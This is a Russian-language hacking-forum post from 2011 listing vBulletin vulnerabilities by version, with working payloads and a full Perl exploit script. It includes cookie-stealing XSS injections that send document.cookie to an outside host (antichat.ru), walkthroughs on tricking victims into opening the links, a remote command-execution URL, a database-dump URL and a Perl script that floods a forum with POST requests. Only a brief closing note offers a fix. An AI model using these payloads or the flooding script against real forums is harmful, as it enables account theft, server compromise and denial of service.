Добро пожаловать на ExpHack.ucoz.org
Make-amxserv.ru
1
Наши сервера ExpHack
















[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Mo_One  
EXPHack.ucoz.org- Найди то что тебе нужно! » Интернет/Безопасность и Хакерство » Уязвимости » Уязвимости vBulletin
Уязвимости vBulletin
: Добавлено: 10.02.2011
Автор: Exp | Просмотрело: | Прокомментировало:
Узнаём версию форума.
находятся несколко js и css файлов в которых можно посмотреть точную версию форума.

Code
vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.js

Например

Code
_http://allcheats.ru/forum/clientscript/vbulletin_editor.css

Начнём со старых версий..Они ещё кое где используются!

vBulletin 2

2.2.* - 2.2.4 - Выполнение произвольного кода
Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
Exploit: [COLOR="red"]_http://www.securitylab.ru/vulnerability/source/207147.php[/COLOR]

2.3.* - SQL injection
Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
Пример:

Code
[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='_http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));  

vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Code
_www.site.ru/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "_http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:

Code
_www.site.ru/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:

Code
<body onLoad=img = new Image(); img.src = "_http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Code
_www.site.ru/forum/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%  E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0  

vBulletin 3.5

3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Code
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
         BODY:---------->No matter
         OTHER OPTIONS:->No matter

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "_http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:

Code
_www.site.ru/forum/profile.php?do=editpassword
         pass:your pass
         email: vashe@milo.com ”><script>img = new Image(); img.src = "_http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
         Note About lenght limitation  
         ****
         forum/profile.php?do=editoptions
         Receive Email from Other Members=yes
         ****
         _www.site.ru/forum/sendmessage.php?do=mailmember&u={your id}  

Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "_http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку _www.site.ru/forum/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:

Code
_www.site.ru/forum/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Code
_www.site.ru/forum/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Далее
: Добавлено: 10.02.2011
Автор: Exp | Просмотрело: | Прокомментировало:
vBulletin® Version 3.8.2 Denial of Service Exploit
Code
##################################################  ######################
# Modules                    #
##################################################  ######################
use IO::SOCKET;           # Object interface                           #
##################################################  ######################
if (@ARGV<1){
print"
##################################################  ######################
## _                     _     _                   _                  ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
##                    ##
##################################################  ######################
##################################################  ######################
##                    ##                    ##
##->vBulletin® Version 3.8.2<-    ##                    ##
##                    ##                    ##
##Gebe diese Daten an             ##                    ##
##1.Ziel                          ##[*] [url]www.Ziel.com[/url]                  ##
##2.Board                         ##[*] vbulletin                     ##
##3.Verwundbarkeit                ##[*] forumdisplay.php?f=           ##
##4.Zeit des vorganges            ##[*] 9999999999999999              ##
##5.Port                          ##[*] 80                            ##
##################################################  ######################
\a";}
$block = "
##################################################  ######################";
$fehler = "Fehler!Fehler!Fehler!Fehler";
$x =0;
      print"$block\n";
      print q(Ziel->);
      chomp($ziel =<STDIN>);
      if ($ziel eq""){
      die "$fehler\a\n";}
      print"$block\n";
        print"$block\n";
        print q(Path->);
        chomp($path =<STDIN>);
        if ($path eq "") {
        die "$fehler !\a\n";}
        print"$block\n";
           print"$block\n";
           print "Verwundbarkeit\n";
           print"forumdisplay.php?f=\n";
           print"->n";
             chomp($vul =<STDIN>);
             if ($vul eq "") {
             die "$fehler !\a\n";}
             print"$block\n";
                print"$block\n";
                print q(Time->);
                chomp($flood =<STDIN>);
                if ($flood eq "") {
                die "$fehler !\a\n";}
                   print"$block\n";
                   print"$block\n";
                   print q(Port->);
                   chomp($port =<STDIN>);
                   if ($port eq ""){
                   die "$fehler \n";}
                   print"$block\n";
                      print q(Send "start"->);
                      chomp($start =<STDIN>);
                      if ($start eq "") {
                      die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel   : $ziel\n";
print "[*]Kontroliere Board  : $path\n";
print "[*]Kontroliere Port   : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
                    PeerAddr => "$ziel",
                    PeerPort => "$port",
                    Proto => "tcp",
                    );

print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}

Уязвимые пользовательские BB коды

Уязвимые версии:
3.8.4 PL2 (скорее всего, все версии)

Описание:
уязвимость позволяет злоумышленнику провести атаку используя html или JavaScript, если он будет следовать следующим условиям:
- код злоумышленника доолжен быть внутри переменной доступного html-тега
- апострофы или ничего следует использовать для инкапсуляции.

Примеры:
Example 1 [src]

Code
<img src='{param}' style='border-width:5px;border-color:red;border-style:outset;' />

Example 2 [href]
Code
<a href={option} style=border-width:5px;border-color:red;border-style:outset;>{param}</a>

Решение:
В php файлах используйте htmlentities($var, ENT_QUOTES); или htmlspecialchars($var);
Как альтернатива, запретить пользователям использовать апострофы в bb кодах.
Далее
EXPHack.ucoz.org- Найди то что тебе нужно! » Интернет/Безопасность и Хакерство » Уязвимости » Уязвимости vBulletin
  • Страница 1 из 1
  • 1
Поиск:
2
Навигация